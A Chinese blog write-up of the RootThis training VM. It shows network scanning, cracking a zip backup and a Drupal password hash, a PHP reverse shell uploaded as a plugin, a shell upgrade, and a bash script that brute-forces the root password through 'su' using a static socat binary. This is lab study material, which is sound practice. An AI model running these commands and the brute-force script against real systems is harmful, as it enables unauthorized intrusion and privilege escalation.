RootThis靶机复盘

最新推荐文章于 2024-07-14 21:53:39 发布
最新推荐文章于 2024-07-14 21:53:39 发布
阅读量244 收藏
点赞数
分类专栏: 打靶机系列 文章标签: linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131756174
版权

RootThis靶机复盘

在这个靶机中收获良多,首先学会了一个新的交互方式,不需要用python了,同时知道了什么是静态链接文件,还有就是学会了遇到数据库文件应该怎么解决。

/usr/bin/script -qc /bin/bash /dev/null
静态链接版本的程序包含了所有的库文件,一个文件就够了,运行不用下载别的库。

正文:

这个靶机我放扫描ip的图片了,这里扫描到一个drupal,这个是我们之前做DC靶机系列时候就遇到过,backup目录是一个加密的zip文件,我们下载到本机上来。

ip扫描,查找靶机地址

nmap -sP 192.168.102.0/24

对靶机进行一个单独的扫描.

nmap -A 192.168.102.175 -p-

扫描目录

dirsearch -u http://192.168.102.175

image-20230714180009976

image-20230714175841084

把因为加密的,我们用工具爆破一下,很快密码就出来了,解压后发现里面是一个数据库。

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt backup.zip

image-20230714175316429

image-20230714180823023

我们打开kali自带的数据库,然后把这个数据库放进去,这样方便我们查看数据库内容,发现多了一个新的数据库。

service mariadb start 

source dump.sql

image-20230714181020937

打开这个数据库,并显示里面的表。

use drupaldb
show tables;

image-20230714181121510

看到里面有一个users表,我们查看一下里面内容,发现有一个用户名和一个加密的密码。

image-20230714181258430

我们用john来爆破一下密码,很快密码就出来了。

image-20230714181901672

这样就可以登陆上我们这个网站了。

image-20230714182041692

因为以前遇到过这样的CMS,所以知道是个什么结构,我们可以加一个PHP插件,这样就能反弹shell到我们的kali上了。

image-20230714182152335

image-20230714182319336

image-20230714182336098

kali中有自带的反弹shell脚本,我们找到并复制到这个网站上去。

image-20230714182459994

把ip和端口号都写程我们自己的。

image-20230714182609904

这样我们就拿到了一个shell,因为这个靶机没有python。

我们可以用下面语句得到一个正宗的shell。

/usr/bin/script -qc /bin/bash /dev/null

image-20230714182655106

我们进去以后发现一个文件,里面提醒说rockyou.txt文件中前300行有root用户的密码。

image-20230714182942613

我们把rockyou.txt的前300行取出来放到300.txt中去,然后下载到靶机的/tmp目录中。

这300个密码实在太多了,我们不能一条一条爆破,所以我们需要写一个bash进行爆破,就用到了下面代码。

bash需要socat工具,我们可以下载静态socat文件,所有需要的库都包含到这里面的。

image-20230714190725691

静态链接版本的socat程序包含了所有的库文件,因此不需要在系统上安装任何依赖项。

静态socat下载地址。

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

a.sh文件内容

#!/bin/bash

for i in `cat 300.txt`
do
	echo "$i"
	(sleep 0.1; echo "$i") | ./socat - EXEC:'bash -c "su -c id"',pty
	
done

image-20230714204306919

给a.sh和socat加上x权限。

在bash a.sh运行,到root密码的时候就会暂停了。

image-20230714200829283

这样我们就成功拿到了root权限。

image-20230714201642117

dumplings。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
树莓派搭建个人服务器
li123128的博客
10-25 793
  阅读目录      前言      docker安装      mysql安装      redis安装      gogs安装      内外穿透      其他安装      树莓派还能做什么      资源消耗截图      结束      前言      上一篇树莓派也跑Docker和.NET Core有对树莓派做简单的介绍。包括系统的烧录、基本的设置、docker的安装、.net c...
dev null linux,/dev/null解决办法
weixin_36168972的博客
05-17 531
/dev/null解决办法发布时间:2008-01-15 01:13:14来源:红联作者:Songs转自:linuxpk系统文件/dev/null丢失怎么办呀重启时出现如下问题/etc/rc.d/rc.sysinit:line 88: /dev/null: Read-only file system/etc/rc.d/rc.sysinit:line 99: /dev/null: Read-only...
Vulntarget靶场渗透笔记[持续更新中]
派大星的博客
04-08 6928
Vulntarget靶场渗透笔记 文章目录Vulntarget靶场渗透笔记靶场官方链接Vulntarget-aWriteup网络拓扑环境信息收集win7 MSF上线横向移动win2016cs上线msf上线域渗透域内提权 靶场官方链接 https://github.com/crow821/vulntarget Vulntarget-a Writeup vulntarget漏洞靶场系列(一) 渗透测试练习No.62 内网渗透 vulntarget-a Win7:win7/admin win2016:Admini
[HackMyVM]靶场 Pyrat
qq_34942239的博客
03-19 215
经过翻文件,在/opt/dev/.git/config下翻到了用户think的密码。nc连接之后 输入admin 再输入密码再输入shell就能拿到root。nc连上之后,经过测试发现可以执行python语句。wp给了两个脚本,第二个部分就是爆破。最后爆破出来密码是september。里面找到一个py脚本,不过没什么用。这里直接看wp了,给了一个爆破脚本。开启了22 8000两个端口。在github上面有东西。根据readme 的提示。然后也没有suid提权。
Linux中关于/dev/null 的解释
choufengyin7439的博客
11-06 366
Linux/Unix中,一般在屏幕上面看到的信息是从stdout (standard output) 或者 stderr (standard error output) 来的。许多人会问,output 就是 output,送到屏幕上不就得了,为什麼还要分成stdout 和 stderr 呢?...
PWN靶机环境 网络安全
05-23
PWN靶机环境
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
Python 运维笔记 -- kubernetes web terminal
wushirenfei的博客
10-24 5604
前言 承接上一篇docker container web terminal,实现Kubernetes的Pod中运行容器terminal连接。所不同的是后端使用的是python kubernetes的package。完整的工程地址请参见:web_terminal_kubernetes。 Kubernetes Client Python kubernetes package直接可以pip安装: $ ...
Python 运维笔记 -- docker container web terminal
wushirenfei的博客
10-21 2377
前言 需求所致需要做平台container的web terminal。因为现在的一些配套Dashboard不好做权限和资源管理。实现原理上,前端开web socket 后端保持双向通信,服务端完成容器对接。初衷是Kubernetes 所启动的pod中container连接,本节我们先从docker做起,后期有机会在介绍如何实现Kubernetes的container web terminal。 在...
centos用户登录提示:-bash: /dev/null: Permission denied解决方法
黄树茂博客
05-03 9599
今天安装oracle,su -oracle发现 [root@ecs-59ff ~]# su - oracle Last login: Fri May 3 22:32:37 CST 2019 on pts/0 -bash: /dev/null: Permission denied -bash: /dev/null: Permission denied -bash: /dev/null: Pe...
-bash: /dev/null: Permission denied或者交叉编译时候卡住的解决办法解决方法
weixin_39540280的博客
11-03 757
当编译驱动的时候发生如下报错或者卡住在make的时候: 解决办法: rm -rf /dev/null mknod /dev/null c 1 3 chmod 666 /dev/null rm -rf /dev/random mknod-m 666 /dev/random c 1 8 rm -rf /dev/urandom mknod-m 666 /dev/urandomc 1 9 ...
c++ vs 输出log到窗口_Kubernetes WebSSH终端窗口自适应Resize
weixin_39915668的博客
11-24 135
追求完美不服输的我,一直在与各种问题斗争的路上痛并快乐着上一篇文章Django实现WebSSH操作Kubernetes Pod最后留了个问题没有解决,那就是terminal内容窗口的大小没有办法调整,这会导致的一个问题就是浏览器上可显示内容的区域太小,当查看/编辑文件时非常不便,就像下边这样,红色可视区域并没有被用到RESIZE_CHANNEL前文说到kubectl exec有两个参数C...
:>/dev/null 2>&1 的作用
631799的专栏
05-22 2362
shell中可能经常能看到:>/dev/null 2>&1  命令的结果可以通过%>的形式来定义输出  /dev/null 代表空设备文件  > 代表重定向到哪里,例如:echo "123" > /home/123.txt  1 表示stdout标准输出,系统默认值是1,所以">/dev/null"等同于"1>/dev/null"  2 表示stderr标准错误  & 表示等同
Linux 命令下面的/dev/null 目录
热门推荐
jackyechina的专栏
10-14 1万+
Linux 命令下面的/dev/null 目录 在shell 脚本中经常会看到 >/dev/null 与>/dev/null 2>&1这样例子#!/bin/bash cd `dirname $0` cd .. DEPLOY_DIR=`pwd` SERVER_NAME=sharding-jdbc-transaction-async-job #LOG LOCATION LOGS_DIR=$
Linux C | 管道open打开方式
I_feige的博客
07-12 354
1.
接着探索Linux的世界 -- 基本指令(文件查看、时间相关、打包压缩等等)
最新发布
weixin_73359101的博客
07-14 1668
命令输出到某个指定文件中,而不是输出到终端屏幕或终端窗口。我们从键盘输入什么,cat命令就打印什么。命令 + >> + 目标文件名。: 将命令的结果写入目标文件中;这两条指令的作用等价。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值